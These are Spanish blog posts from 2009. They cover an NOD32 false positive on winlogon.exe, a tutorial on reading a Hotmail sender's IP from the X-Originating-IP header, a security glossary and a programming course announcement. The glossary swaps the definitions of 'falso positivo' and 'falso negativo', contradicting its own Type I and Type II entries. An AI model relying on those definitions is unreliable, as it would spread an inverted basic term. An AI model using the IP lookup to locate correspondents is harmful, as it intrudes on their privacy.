No es raro que un antivirus en su proceso de mejora detecte un archivo del sistema, seguro que alguno realiza acciones muy sospechosas. Lo raro es que no se probara antes, seguro que tienen un banco de pruebas gigantesco con "Goodware" y hacen una pasada antes de dar como bueno un nuevo algoritmo, regla heurística, firmas o lo que sea. Pero hay tantos programas, tantas dlls, tantas versiones, que al final son habituales estas cosas.

Hoy mismo NOD32 hizo lo propio con winlogon.exe, es lo que tiene la paranoia de los antivirus, es como mi paranoia, TODO es malware y si actualmente no lo es lo será es la siguiente actualización. Te jodes.

Winlogon:Winlogon es parte esencial de windows pero es a su vez, un blanco común para varias amenaza que pueden modificar su funcionamiento y su consumo de memoria. Un uso de memoria acrecentado para este proceso puede indicar que ha sido capturado por un agente invasor, por ejemplo Dmoys.exe.

Esto no implica que deba eliminar el archivo, en todo caso deberia, anteponer mas seguridad en el sitema operativo, ya que saben que programas se aprovechan de este servicio, bloquearlos, no eliminar un servicio de vital funcionamiento para el sistema operativo...

Noticia Externa: Actualizacion de Nod32 Presenta falsos positivos y borra archivos importantes para el sistema.

By Shell Root con modificaciones y agregados mios...

Obtenieindo IP de Un correro electronico

2009-10-16T01:21:00.000-07:00

Hola, en este tutorial aprenderemos como obtener a las direcciones ip de algunas personas que nos mandan correos electronicos mediante hotmail

Primero: ¿ Que es una IP ?

Una dirección IP es un número que identifica de manera lógica y jerárquica a una interfaz de un dispositivo (habitualmente una computadora) denttro de una red que utilice el protocolo tcp/ip (Internet Protocol), que corresponde al nivel de red del protocolo TCP/IP. Dicho número no se ha de confundir con la direccion MAC ( investigar un poco mas) que es un número hexadecimal fijo que es asignado a la tarjeta o dispositivo de red por el fabricante, mientras que la dirección IP se puede cambiar. utilice una dirección IP. Esta dirección puede cambiar cada vez que se conecta; y a esta forma de asignación de dirección IP se denomina una dirección IP dinámica (normalmente se abrevia como IP dinámica).

Si queres saber cual es tu ip...
anda a Inicio---> Ejecutar----> cmd.exe
te va a aparecer una consola negra
... ahi escribi ipconfig

Click AQUI para ver la imagen...

Bueno prosigamos ::

nos dirigimos a www.hotmail.com
ingresamos nuestra cuenta y nuestra contraseña.. ( esto es muy importante xd )
y nos dirigimos a bandeja de entrada...
vemos si tenemos algun mensaje ( que sea de algun compañero nuestro, no de redes sociales ej: Facebook, tuenti, etc)
sobre el mensaje, tocamos el click derecho---> Ver codigo fuente del mensaje

Click AQUI para ampliar

PASO 2)
Cuando estemos en el code fuente del mensaje, ( la mayoria de la gente no entiende nada, pero como nosotros estudiamos HTML si.. Esta demas aclarar que los hackers si entienden no ? xD)

cabe destacar que eso no es el codigo fuente ( letras colores, etc) del mensaje, esos son los datos.. hacia donde va quien lo manda, etc.

Dentro del code del mensaje, tendremos que buscar la linea que dice:

X-Originating-IP: [IP] ---> En ip iria la direccion IP que tiene nuestro compañero

Click AQUI para ampliar

tutorial By Dr [F]

Algunas definiciones de Seguridad Informatica

2009-10-15T15:37:00.000-07:00

Primero que nada , estas definiciones estan sacadas de www.digonzalez.net... dedicado a mis amigos (y)

Agente: En detección de intrusiones, una entidad independiente que realiza labores de monitorización y análisis de bajo nivel y envía sus resultados a un coordinador o un transmisor-receptor. También conocido como sensor. Véase también ("sensor").

Almacén, ante-memoria, depósito: Mecanismo especial de almacenamiento de alta velocidad. Puede ser una zona reservada de la memoria principal, o un dispositivo independiente de almacenamiento de alta velocidad.

Amenaza: Situación o evento con que puede provocar daños en un sistema.

Amplitud de banda, ancho de banda: 1. Diferencia en hertzios (Hz) entre la frecuencia más alta y la más baja de un canal de transmisión. 2. Datos que puede ser enviados en un periodo de tiempo determinado a través de un circuito de comunicación. Se mide en bits por segundo (bps).

Análisis basado en intervalo: Análisis desarrollado de forma discontinua. Se aplica en casos de recopilación no continua de datos, y en casos de recopilación continua pero análisis discontinuo. También se denomina análisis en modo por lotes, o estático.

Análisis con acreditaciones: En análisis de vulnerabilidad es, enfoque de monitorización pasiva en los que son necesarias contraseñas u otro tipo de credenciales. Normalmente implica el acceso a los datos de un objeto de sistema.

Análisis de vulnerabilidad es: Análisis del estado de la seguridad de un sistema o sus componentes mediante el envío de pruebas y recogida de resultados en intervalos.

Análisis dinámico, o en tiempo real: Análisis desarrollado en tiempo real, o de forma continua.

Análisis en modo por lotes: Véase "análisis basado en intervalo".

Análisis en tiempo real: Análisis realizado de forma continua, con resultados obtenidos en un tiempo en que permita alterar el estado actual sistema.

Análisis estático: Análisis de información desarrollado de forma discontinua. También conocido como análisis basado en intervalo o en modo por lotes.

Análisis sin acreditaciones: En análisis de vulnerabilidad es, enfoque de monitorización pasiva en los que las contraseñas u otro tipo de credenciales no son necesarias. Normalmente implica el lanzamiento de ataques contra el sistema, provocando algún tipo de reacción.

Anomalía: No usual o estadísticamente raro.

Anonimato, anonimia: Carácter o condición de anónimo (desconocimient o del nombre o identidad).

Aplicación engañosa: Aplicación cuya apariencia y comportamiento emulan a una aplicación real. Normalmente se utiliza para monitorizar acciones realizadas por atacantes o intrusos.
Ardid, artificio: Implementación de un fallo de seguridad, utilizado bien para comprobar y demostrar la existencia del fallo, o bien para comprometer el sistema de forma ilícita.

Ataque por interceptación: Estrategia de ataque en la que el atacante intercepta una comunicación entre dos partes, substituyendo el tráfico entre ambas a voluntad y controlando la comunicación.

Auditoría: Proceso de examinar y revisar un informe cronológico de los eventos de sistema para determinar su significado y valor.

Auditoría mediante proceso electrónico de datos: Evolución de los tradicionales procesos y prácticas de auditoría, utilizando sistemas de proceso de datos.

Autenticación, autentificación: Proceso de confirmar la identidad de una entidad de sistema (un usuario, un proceso, etc.).

Auto contenido: Historiales de eventos de sistema que no necesitan de otros historiales para su interpretación.

Autorización: Acción de otorgar el acceso a usuarios, objetos o procesos.
Basado en aplicación: Se utiliza para describir monitores que recogen datos a partir de aplicaciones. Las fuentes de datos pueden ser registros de eventos u otro tipo de información perteneciente a aplicaciones.

Basado en máquina: Que monitoriza información de fuentes internas a una máquina.
Basado en multi-máquina: Que monitoriza información de fuentes internas a múltiples máquinas. Véase también ("basado en máquina").

Basado en objetivo: Que monitoriza información de determinados objetos, generalmente utilizando métodos de cifrado como funciones resumen para permitir la detección de cambios.

Basado en red: Que monitoriza información de fuentes de red, generalmente captura de paquetes.

Basado en reglas: En detección de intrusiones, que utiliza patrones de actividad (generalmente ataques conocidos) para reconocer una intrusión.

Basado en testigo: Sistemas que emplean elementos especiales como tarjetas inteligentes, llaves, o discos para la autenticación de usuario.

Base de reglas: Conjunto de reglas utilizadas para analizar los registros de datos.
Bit: Abreviación de "binary digit". Unidad elemental de información en un sistema informático. Tiene un único valor en formato binario: "0" ó "1". Véase también "byte".

Bloque de mensajes de servidor (SMB): También conocido como "Session Message Block", NetBIOS y LanManager. Es un protocolo utilizado por sistemas Windows para compartir ficheros, impresoras, puertos serie y otras entidades de comunicación entre ordenadores.

Búfer, memoria tampón, memoria intermedia: Ã€rea de memoria de un sistema reservada para almacenar información de forma temporal. Generalmente se utiliza para compensar las diferencias de velocidad surgidas entre varias señales o procesos.

Byte, octeto: Unidad de información compuesta por ocho bits. Modificando los diferentes bits de un byte se pueden obtener hasta 256 combinaciones diferentes.

Caballo de Troya, troyano: Programa informático de aspecto inofensivo que oculta en su interior un código que permite abrir una "puerta trasera" en el sistema en que se ejecuta. Véase también ("puerta trasera").

Cable de rastreo, cable de sólo recepción: Cable de red modificado para imposibilitar el envío de datos, permitiendo exclusivamente su recepción.

Capa de Conexión Segura (SSL): Protocolo creado por Netscape para permitir la transmisión cifrada y segura de información a través de la red.

Capacidad de ser registrado: Habilidad de relacionar una determinada actividad o evento con la parte responsable.

Célula de aislamiento, célula acolchada: Sistema o red consistente en una copia parcial de un sistema real, al que un dispositivo con capacidades de enrutamiento y detección de intrusiones redirige el tráfico hostil.

Cifrado: Proceso mediante el cual se toma un mensaje en claro, se le aplica una función matemática, y se obtiene un mensaje codificado.

Cobertura, alcance: Proporción de ataques conocidos que un detector de intrusiones es capaz de detectar.

Código abierto: Software que cumple los criterios descritos por la iniciativa "Open Source". Este término no implica el acceso al código fuente. Véase también ("software libre").

Composición: 1. En detección de intrusiones, proceso de combinar información procedente de distintas fuentes en un flujo de datos coherente. 2. En seguridad informática, combinar un conjunto de componentes en un sistema para obtener los atributos de seguridad del sistema, según las propiedades de los componentes.

Comprobador de integridad: Herramienta de seguridad que utiliza funciones resumen basadas en algoritmos de cifrado para detectar alteraciones en objetos de sistema.

Comprometido, violentado: Estado de un equipo/sistema cuando un intruso ha entrado.

Concentrador: Dispositivo que permite la interconexión de las estaciones de trabajo entre sí. No realiza funciones de encaminamiento; lo que recibe por un puerto lo reenvía a través del resto. Véase también ("repetidor").

Condición de carrera: Comportamiento anómalo provocado por una dependencia excesiva del tiempo relativo transcurrido entre diferentes eventos.

Confianza: Esperanza firme de que un sistema se comporte como corresponde.

Confidencialid ad: Requisito de seguridad que indica que el acceso a los recursos de sistema debe estar limitado exclusivamente a los usuarios con acceso autorizado.

Conmutador: Elemento utilizado para interconectar máquinas a una red. Tiene funciones de encaminamiento básico de tráfico de red, y permite subdividir las redes en segmentos, de forma similar a un puente. Véase también ("puente").

Control de acceso: Limitar el acceso a objetos de acuerdo a los permisos de acceso del sujeto. El control de acceso puede ser definido por el sistema (Control de accesos obligatorio, MAC) o por el propietario del objeto (Control de accesos discrecional, DAC).

Control de acceso discrecional (DAC): Política de acceso a los datos en la que el propietario del objeto, de forma voluntaria (discrecional), concede o deniega el acceso a éste a otros sujetos. Véase también ("Control de accesos obligatorio").

Control de accesos obligatorio (MAC): Política de acceso a los datos en la que el sistema comparte de forma obligatoria tanto los objetos como los sujetos. A partir de dicha forma de compartir los elementos, se establecen unas reglas de acceso. Véase también ("Control de acceso discrecional").

Correlación: En detección de intrusiones, relación que se establece entre diferentes fuentes de información.

Cortafuegos: Herramienta de seguridad que proporciona un límite entre redes de distinta confianza o nivel de seguridad mediante el uso de políticas de control de acceso de nivel de red.

Criterio de Evaluación de Sistemas Informáticos Fiables (TCSEC): Conocido comúnmente como Libro Naranja, describe las propiedades que deben cumplir los sistemas para contener información sensible o clasificada. Este criterio fue desarrollado por el Centro de Seguridad Informática Nacional (NCSC).

Datagrama: Mensaje que se envía en una red de comunicaciones de ordenadores por intercambio de paquetes.

Denegación de servicio (DoS): Estrategia de ataque que consiste en saturar de información a la víctima con información inútil para detener los servicios que ofrece. Véase también ("Denegación de servicio distribuida").

Denegación de servicio distribuida (DDoS): Estrategia de ataque que coordina la acción de múltiples sistemas para saturar a la víctima con información inútil para detener los servicios que ofrece. Los sistemas utilizados para el ataque suelen haber sido previamente comprometidos, pasando a ser controlados por el atacante mediante un cliente DDoS. Véase también ("Denegación de servicio").

Desbordamiento de búfer, desbordamiento de la pila: Técnica que consiste en almacenar más datos en un búfer de los que puede contener. Los datos que no caben pueden invadir zonas adyacentes a la del búfer, corrompiéndolas o sobrescribiéndolas. Este método es ampliamente utilizado para realizar ataques que abren interfaces de comando remotas.

Desbordamiento de la pila: Caso especial del desbordamiento de búfer, en el que el objetivo es la pila del sistema. Véase también ("pila", "desbordamiento de búfer").

Deslizamiento sigiloso de sesión: Técnica utilizada por un usuario que consiste en modificar gradualmente su comportamiento para entrenar al detector de anomalías. De esta forma, se consigue que el detector diagnostique como actividad normal un posible ataque.
Detección de anomalías: Detección basada en la actividad de sistema que coincide con la definida como anormal.

Detección de intrusiones: Proceso de monitorizar los eventos de un sistema o red en busca de signos que indiquen problemas de seguridad.

Detección de usos indebidos: Detección basada en la actividad de sistema que coincide con la definida como mala.

Detector de Intrusiones de Nodo de Red: Detector de intrusiones basado en red que se instala en una máquina. Esta medida ayuda a solventar problemas como los asociados a entornos conmutados, o cifrado en las comunicaciones .

Determinista: Propiedad de los procesos que permite recorrer un proceso hacia delante o hacia atrás, desde cualquier punto del proceso.

Disponibilidad: Requisito de seguridad que implica que la información y los servicios del sistema continúen en funcionamiento y que los usuarios autorizados puedan acceder a los recursos cuando lo necesiten, dónde lo necesiten, y en la forma en que lo necesiten.

Dispositivo de escucha de red: Dispositivo, de aspecto externo similar a un concentrador o un conmutador, que permite a un rastreador interceptar el tráfico de red entre dos segmentos sin ser detectado. Además, apenas afecta al rendimiento de la red.

Encaminador, enrutador: Dispositivo que reenvía paquetes de datos entre redes. Permite conectar al menos dos redes. Los puntos de conexión con el "encaminador" son las puertas de enlace de cada red.

Enmascarado: Atacante que accede a un sistema utilizando identificadore s de usuario y contraseñas de usuarios legítimos.

Entorno conmutado: Entorno de red en el que predomina el uso de conmutadores.

Envoltura, forro, empacador: Software que complementa las características de otro software para mejorar determinados aspectos como compatibilidad, o seguridad.

Error de Tipo I: En detección de intrusiones, error producido cuando el sistema diagnostica como ataque una actividad normal. También conocido como falso positivo. Véase también ("falso positivo").
Error de Tipo II: En detección de intrusiones, error producido cuando el sistema diagnostica como actividad normal un ataque. También conocido como falso negativo. Véase también ("falso negativo").

Escalabilidad: Forma en que la solución a un determinado problema se comporta cuando el tamaño del problema crece.

Escaneo sigiloso de puertos: Barrido de puertos mediante diversas técnicas con el fin de evadir los métodos de detección comunes. Algunas de estas técnicas implican un escaneo intencionadame nte lento, o el envío de paquetes especiales aprovechando particularidad es del protocolo. Véase también ("escaneo de puertos").

Escáner o analizador de vulnerabilidad es: Herramienta diseñada para llevar a cabo análisis de vulnerabilidad es.

Esteganografía: Arte de transmitir información de modo que la presencia de la misma pase inadvertida. Se suele hacer camuflando los datos en el interior un texto, imagen, o fichero multimedia. Proviene de las palabras griegas steganós (cubierto) y graptos (escrito).

Ethernet: Sistema de red de área local de alta velocidad.

Falseamiento, enmascaramient o: Modificación de la identidad de origen real durante una comunicación. El método más común consiste en alterar directamente la dirección origen de cada paquete de la comunicación.

Falso negativo: En detección de intrusiones, error producido cuando el sistema diagnostica como ataque una actividad normal. También conocido como error de tipo I.

Falso positivo: En detección de intrusiones, error producido cuando el sistema diagnostica como actividad normal un ataque. También conocido como error de tipo II.

Filtro de anomalías de protocolo: Tipo de filtro de anomalías estadísticas al que se le han añadido conocimientos sobre un protocolo determinado, para poder detectar usos poco comunes del mismo. Véase también ("filtro de anomalías estadísticas").

Filtro de anomalías estadísticas: Filtro que permite la detección de actividades y comportamiento s poco usuales o comunes.

Filtro de paquetes Berkeley (BPF): Una arquitectura diseñada para la captura de paquetes, desarrollada en el "Lawrence Berkeley National Laboratory".

Firma, patrón: En detección de intrusiones, patrones que indican los usos indebidos de un sistema.

Formato de registro binario: Formato de registro utilizado por herramientas basadas en las librerías "libpcap", como por ejemplo "tcpdump". Se aplica para registrar el tráfico de red. Algunas de las ventajas del formato binario sobre el formato ASCII son que ocupa menos, y la información que contiene puede ser accedida en menor tiempo.

Función resumen: Función de cifrado que permite detectar cambios en objetos.

Generación de Patrones Probables: Técnica que permite, mediante métodos estadísticos, predecir eventos futuros basándose en los que ha ya han tenido lugar. En determinadas circunstancias, si no se cumplen los eventos esperados, hay posibilidades de que se trate de un ataque.

Gestión de redes: Controlar diversos aspectos de una red para optimizar su eficiencia. Las cinco categorías de gestión de red son: seguridad, fallo, auditoría, configuración y gestión de rendimiento.

Gestión de rendimiento: En gestión de redes, medición de los diferentes elementos de la red. Los resultados de estas mediciones se utilizan para optimizar su funcionamiento .
Gestión de seguridad: 1. Proceso de establecer y mantener la seguridad en un sistema o red de sistemas informáticos. Las etapas de este proceso incluyen la prevención de problemas de seguridad, detección de intrusiones, investigación de intrusiones, y resolución. 2. En gestión de redes, controlar (permitir, limitar, restringir, o denegar) acceso a la red y recursos, buscar intrusiones, identificar puntos de entrada de intrusiones, y reparar o cerrar estas posibles vías de acceso.

Gestor de registro de actividades: Componente de sistema encargado de las labores de registro de actividad.

Grupo de Trabajo de Ingeniería de Internet (IETF): Una de las principales organizaciones encargadas de la formulación de estándares en Internet.

Gusano: Programa informático que se auto-duplica y auto-propaga. A diferencia que los virus, suelen estar diseñados para redes.

Horizonte de evento: Límite de tiempo aplicable a una característica de sistema determinada, como por ejemplo la diferencia de tiempo entre dos entradas a un sistema.

Identificación de Sistema Operativo: Conjunto de técnicas utilizadas para determinar la identidad del sistema operativo de un sistema remoto. Generalmente se logra mediante el envío de determinados datos de red y el posterior análisis de las respuestas recibidas.

Identificación y autenticación (I&A): Mecanismo de seguridad que asigna una identidad única a cada usuario (identificación) y la comprueba (autenticación).

Inodo, nodo i: Estructura de datos que contiene información sobre cada archivo en sistemas UNIX. Cada archivo tiene un nodo-i asociado.

Integración: En ingeniería de sistemas, combinación de componentes en una entidad coherente.

Integridad: Requisito de seguridad que indica que la información deberá ser protegida ante alteraciones no autorizadas.

Inteligencia artificial (AI): Ciencia que busca la comprensión de entidades inteligentes.

Interconexión de Sistemas Abiertos (OSI): Estructura de protocolos en siete niveles propuesta por ISO (International Standardisatio n Organisation) e ITU-T (International Telecommunicat ion Union Telecommunicat ion Standardizatio n Sector).

Interfaz Común de Acceso (CGI): Especificación para la transmisión datos entre programas residentes en servidores Web y navegadores.

Interfaz de comandos polimórfica: Interfaz de comandos cuyo código cambia con cada ejecución. Esto se hace para evadir los detectores de intrusión basados en reglas. En la mayoría de los casos se utilizan durante ataques de desbordamiento de búfer.

Interfaz de comandos segura (SSH): También conocida como "Secure Socket Shell", es una interfaz de comandos basada en UNIX y un protocolo para acceder de forma segura a una máquina remota. Es ampliamente utilizada por administradore s de red para realizar tareas de gestión y control. SSH es un conjunto de tres utilidades: slogin, ssh y scp; versiones seguras de las anteriores utilidades de UNIX: rlogin, rsh y rcp.

Interfaz de programación de aplicaciones (API): Conjunto de rutinas, protocolos, y herramientas para la construcción de aplicaciones software.

Interoperabili dad: Capacidad de un sistema para trabajar con otros sin que sean necesarios grandes esfuerzos por parte del usuario.

Intrusión: Violación intencionada de las políticas de seguridad de un sistema.

Intrusos desde el exterior: Usuarios no autorizados de un sistema.

Libpcap: Interfaz independiente del sistema, para la captura de paquetes de nivel de usuario, escrito en el "Lawrence Berkeley National Laboratory".

Libro Marrón ("Guía para la Comprensión de la Auditoría en Sistemas de Confianza"): Uno de los volúmenes de la Serie Arco Iris que explica los criterios del sistema de auditoría de Sistemas de Confianza, mencionando aspectos relevantes para los sistemas de detección de intrusiones.

Lista de Control de Acceso (ACL): Conjunto de datos que indican al sistema operativo qué permisos tiene un usuario o grupo sobre un determinado objeto de sistema. Cada objeto tiene atributos de seguridad únicos que indican qué usuarios pueden accederlo, y la Lista de Control de Acceso contiene una descripción de los privilegios de acceso de cada objeto y usuario.

Lógica difusa: Forma de razonamiento que incorpora criterios múltiples para tomar decisiones y valores múltiples para evaluar posibilidades. Permite formalizar operaciones del razonamiento impreciso sobre conceptos imprecisos, comunes en el razonamiento humano.

Lote: En informática, programa asignado a un sistema para ser ejecutado de forma desatendida. Los trabajos por lotes suelen ejecutarse en un plano secundario, mientras que los interactivos se ejecutan en primer plano.

Malla mundial, telaraña mundial: Sistema de información distribuido, basado en hipertexto. La información puede ser de diferente naturaleza, como por ejemplo texto, gráfico, audio, o vídeo. Véase también ("web").

Malla, telaraña: Servidor de información WWW. Se utiliza también para definir el universo WWW en su totalidad. Véase también ("WWW").

Marco de Detección de Intrusiones Común (CIDF): Grupo de trabajo encargado de crear interfaces que permitan a los desarrolladore s de detección de intrusiones compartir sus conocimientos y poder reutilizar los resultados en otros sistemas. Fue fundado por Teresa Lunt.

Minería de datos: Arte y ciencia de descubrir y explotar relaciones nuevas, útiles, y provechosas en grandes cantidades de información.

Modo en línea: Método de interceptación del tráfico de red que consiste en hacer pasar todo el tráfico a través de un monitor o rastreador, generalmente configurado como puente para minimizar el impacto sobre el rendimiento de la red y dificultar su detección.

Modo promiscuo: Respecto a una interfaz de red, el modo de operación que genera una interrupción por cada actividad de red detectada. Esto permite a la interfaz recoger todo el tráfico de red de su segmento y entregárselo al detector de intrusiones.

Módulo de Seguridad Básico (BSM): Paquete de seguridad de Sun Microsystem proporcionado por los sistemas operativos de Sun para cumplir con los requisitos del documento TCSEC (la clase C2).

Monitor, monitorizar: Cualquier mecanismo o método utilizado por un sistema de detección de intrusiones para obtener información.

Monitorización intrusa: En análisis de vulnerabilidad es, obtener información mediante la realización de comprobaciones que afectan al estado del sistema, llegando en algunos casos a provocar su caída.
Monitorización no intrusa: En análisis de vulnerabilidad es, obtener información mediante la ejecución de una lista de comprobaciones de los atributos del sistema.

No paramétrico: Técnicas estadísticas que no hacen suposiciones sobre la distribución subyacente de los datos.

Paquete: Estructura de datos con una cabecera que puede estar o no lógicamente completa. Más a menudo, se refiere a un empaquetamient o físico de datos que lógico. Se utiliza para enviar datos a través de una red conmutada de paquetes.

Parche: En seguridad informática, código que corrige un fallo (agujero) de seguridad.

Petri Net Coloreada (CP-net): Lenguaje orientado a objetos para el diseño, especificación y verificación de sistemas. Está especialmente indicado en sistemas compuestos por gran variedad de procesos que necesitan estar comunicados y sincronizados.

Pila: Ã€rea de datos o búfer utilizada para almacenar peticiones que deben ser atendidas. Tiene una estructura FILO (primero en entrar, último en salir) o LIFO (último en entrar, primero en salir).

Pila de protocolos: Conjunto de protocolos que se implementan en un determinado sistema.
Política de monitorización: Conjunto de reglas que definen la forma en que se debe capturar e interpretar la información.

Política de seguridad: 1. Conjunto de estatutos que describen la filosofía de una organización respecto a la protección de su información y sistemas informáticos. 2. Conjunto de reglas que ponen en práctica los requisitos de seguridad del sistema.

Privacidad: Estar libre de accesos no autorizados.

Privilegio: Nivel de confianza perteneciente a un objeto de sistema.

Probar mediante explotación: Método de comprobación de seguridad que consiste en lanzar ataques conocidos contra el objetivo y estudiar los resultados. Véase también ("análisis de vulnerabilidad es").

Procesamiento por lotes, procesamiento en lotes: Procesamiento realizado en intervalos de tiempo, de forma discontinua.

Procesos de confianza: Procesos que sirven para cumplir un objetivo de seguridad.

Protocolo de Control de Transmisión / Protocolo Internet (TCP/IP): Conjunto de protocolos básico sobre los que se fundamenta Internet. Se sitúan en torno al nivel tres y cuatro del modelo OSI.

Protocolo de Tiempo de Red (NTP): Protocolo situado sobre TCP/IP diseñado para permitir la sincronización de los relojes de las máquinas conectadas a través de una red.

Protocolo de Transferencia de Ficheros (FTP): Protocolo que permite a un usuario de un sistema acceder a otro sistema de una red, e intercambiar información con el mismo.

Protocolo de Transferencia de Hipertexto (HTTP): Protocolo usado para la transferencia de documentos WWW. Véase también ("WWW").

Protocolo Internet versión 6: Revisión del Protocolo Internet que viene a sustituir a la tradicional versión 4. Cuenta con nuevas características, como mejoras en las direcciones, simplificación de la cabecera, nuevo soporte de extensiones y opciones, etiquetado de tráfico, y capacidades de autenticación y privacidad.

Protocolo Simple de Transferencia de Correo: Protocolo de comunicaciones para la transmisión de correo electrónico entre ordenadores.

Puente: Dispositivo que permite la interconexión de dos redes con igual o distintos interfaces o pila de protocolos. Realiza funciones de encaminamiento de paquetes a nivel de enlace. Un puente multi-puerto es prácticamente un conmutador. Véase también ("conmutador")

Puerta trasera: Mecanismo que permite a un atacante entrar y controlar un sistema de forma oculta. Suelen instalarse justo después de comprometer un sistema. Véase también ("vulnerabilidad").

Puerto de extensión, puerto abarcador: Puerto especial con el que cuentan algunos conmutadores avanzados. Está programado para poder recibir una copia del tráfico destinado a uno o varios puertos del conmutador.

Rastreador: Dispositivo capaz de capturar todos los paquetes de datos que viajan por el segmento de red al que está conectado. Cuenta con una interfaz de red en modo promiscuo.

Rechazo, esquivamiento: Respuesta ante un ataque en la que el sistema termina y rechaza las subsiguientes conexiones con dirección del atacante. Véase también ("respuesta activa").

Red Privada Virtual (VPN): Red generalmente construida sobre infraestructur a pública, que utiliza métodos de cifrado y otros mecanismos de seguridad para proteger el acceso y la privacidad de sus comunicaciones .

Red trampa, red de miel: Es un tipo de sistema trampa. Es una red de sistemas reales diseñada para ser comprometida.

Reducción de auditoría: Método utilizado para eliminar información redundante o no necesaria de los registros de auditoría.

Registro de aplicación: En sistemas Windows, es uno de los tres tipos de registros de eventos. Este registro contiene los eventos generados por las aplicaciones.

Registro de eventos: Mecanismo de auditoría utilizado por sistemas Windows.

Registro de seguridad: En sistemas Windows, es uno de los tres tipos de registros de eventos. Este registro contiene los eventos considerados como relevantes en materia de seguridad.

Registro de sistema: 1. En sistemas Windows, es uno de los tres tipos de registros de eventos. Este registro contiene los eventos generados por los componentes de sistema. 2. en sistemas UNIX, ficheros de eventos de sistema y aplicaciones, que suelen consistir en ficheros de texto consistentes en una línea por cada evento.

Registros de auditoría de sistema operativo: Historiales de eventos de sistema generados por el mecanismo especializado de un sistema operativo.

Repetidor: Dispositivo que regenera la señal que pasa a través de la red, permitiendo extender la distancia de transmisión de dicha señal. Un repetidor multi-puerto se conoce como un concentrador. Véase también ("concentrador").

Respuesta activa: Respuesta en la que el sistema (automáticamente, o junto con el usuario) modifica el curso del ataque. Hay tres formas básicas de respuestas activas: ejecutar acciones contra el intruso, corregir el entorno, y recopilar más información.

Respuesta pasiva: Respuesta en la que el sistema simplemente registra e informa de la intrusión o ataque, delegando en el usuario las acciones subsecuentes.

Rompedor de contraseñas: Herramienta de seguridad diseñada para descubrir las contraseñas de los usuarios. En la mayoría de los casos se utilizan diferentes aproximaciones para obtenerlas.
Salto de red: Estrategia de ataque en la que el atacante intenta ocultar su identidad realizando sus actividades desde otros sistemas comprometidos.

Segmento: Unidad lógica de datos, en particular un segmento de TCP es la unidad de datos transferida entre dos módulos de TCP.

Seguridad: 1. Según un enfoque práctico, la seguridad implica que un sistema se comporte de la manera esperada. Esta definición depende de los niveles de confianza 2. Según un enfoque formal, consiste en el cumplimiento de la "tríada de conceptos": confidencialid ad, integridad y disponibilidad .

Seguridad de Protocolo Internet (IPSec): Conjunto de protocolos desarrollados por IETF para soportar el intercambio seguro de paquetes en el nivel IP. IPsec se utiliza ampliamente para implementar Redes Virtuales Privadas (VPNs).

Sensor: En detección de intrusiones, una entidad que realiza labores de monitorización y obtención de datos de las fuentes de información. También conocido como agente. En muchos IDS, el sensor y el analizador forman parte del mismo componente. Véase también ("agente").

Serie Arco Iris: Conjunto de documento que definen la Iniciativa de Sistemas Confiables, un programa del gobierno de EE.UU. para resolver problemas relacionados con la seguridad informática. Los nombres de los documentos se corresponden con los colores de sus cubiertas. Véase también ("Libro Naranja" y "Libro Marrón").

Servidor de Gestión de Sistemas (SMS): Sistema desarrollado por Microsoft que permite gestionar la configuración de estaciones y servidores Windows.

Sistema de detección de intrusiones (IDS): Sistema que monitoriza redes de ordenadores y sistemas en busca de violaciones de políticas de seguridad. Está compuesto por tres elementos fundamentales: fuentes de información, motor de análisis y mecanismos de respuesta.

Sistema de Nombres de Dominio (DNS): Servicio distribuido de búsqueda de datos que realiza traducciones entre direcciones IP y nombres de máquinas. La estructura de los nombres de máquina (nombres de dominio), que son más fáciles de recordar que las direcciones IP, sigue una estructura jerárquica.

Sistema de prevención de intrusiones (IPS): Sistema que combina las capacidades de bloqueo de un cortafuegos y las de análisis de un IDS. Está diseñado para detener ataques antes de que tengan éxito.

Sistema experto: Aplicación informática que realiza una tarea que podría realizar un humano experto, como por ejemplo, diagnóstico de enfermedades, ataques, o búsqueda de rutas de encaminamiento óptimas. Los sistemas expertos pertenecen a una categoría general de aplicaciones que utilizan técnicas de inteligencia artificial.

Sistema Experto de Detección de Intrusiones (IDES): Sistema de Detección de Intrusiones basado en reglas diseñado para detectar ataques conocidos. Fue el precursor de NIDES. Véase también "Sistema Experto de detección de intrusiones de siguiente generación (NIDES)".

Sistema Experto de detección de intrusiones de siguiente generación (NIDES): Detector de intrusiones que realiza funciones de monitorización en tiempo real de actividades de usuario a través de múltiples sistemas conectados vía Ethernet. Véase también "Sistema Experto de Detección de Intrusiones (IDES)".

Sistema trampa, tarro de miel: Recurso de sistema de información cuyo valor reside en el uso no autorizado o ilícito de dicho recurso.

Sistemas de confianza: Sistemas que emplean las suficientes medidas para cumplir los requisitos necesarios para su uso en el proceso de información sensible o clasificada.

Software libre: Código que otorga libertad a los usuarios para ejecutar, copiar, distribuir, estudiar, cambiar y mejorar el mismo. Véase también ("código abierto").

Sondeo de puertos, escaneo de puertos: Barrido de puertos generalmente para determinar qué servicios ofrece un sistema. Es uno de los métodos más comunes entre los atacantes para obtener información de sus objetivos. Véase también ("escaneo sigiloso de puertos").

STREAMs: Modelo de programación de sistema para el desarrollo de controladores de dispositivos.

Suma de control, suma de verificación, suma de comprobación: Algoritmo matemático que genera un número único a partir de un conjunto de datos, utilizada para comprobar la integridad de los mismos.

Sbr4++: Una propuesta de estándar para el formato de los registros de auditoría de los sistemas operativos. Fue publicada por Stephen Smaha.

Tcpdump: Herramienta de monitorización y adquisición de datos que realiza labores de filtrado, recopilación, y visualización de paquetes.

Uso indebido: Actividad o comportamiento conocida como mala o inapropiada.

Virus polimórfico: Virus informático que cambia de aspecto con cada ejecución. Esta característica tiene el objeto de evitar los detectores de virus.
Vulnerabilidad es: Debilidades en un sistema que pueden ser utilizadas para violar las políticas de seguridad.
Zona desmilitarizad a, red perimétrica (DMZ): Máquina o pequeña subred situada entre una red interna de confianza (como una red local privada) y una red externa no confiable (como Internet). Normalmente en esta zona se sitúan los dispositivos accesibles desde Internet, como servidores Web, FTP, SMTP o DNS, evitando la necesidad de acceso desde el exterior a la red privada. Este término es de origen militar, y se utiliza para definir un área situada entre dos enemigos.

El Dr [F]

Muy pronto. Curso de Programacion

2009-10-14T02:39:00.001-07:00

Hola, mas abajo podran ver, hice un posteo acerca de como agregar una libreria (conio.h) a nuestro compilador, luego expondre en este blog, tutoriales, que enseñen algo acerca de programacion en lenguaje C no C++
Ya a fin de mes, estaria empezando alguno que otro masomenos completo para que se vayan adentrando en este mundo...

Saludos

El [Dr F]

Libreria conio en Dev-C++

2009-10-14T01:49:00.000-07:00

Hola, en este posteo, les enseñare como instalar la libreria conio con el compliador Dev-C++...
Bueno empezemos
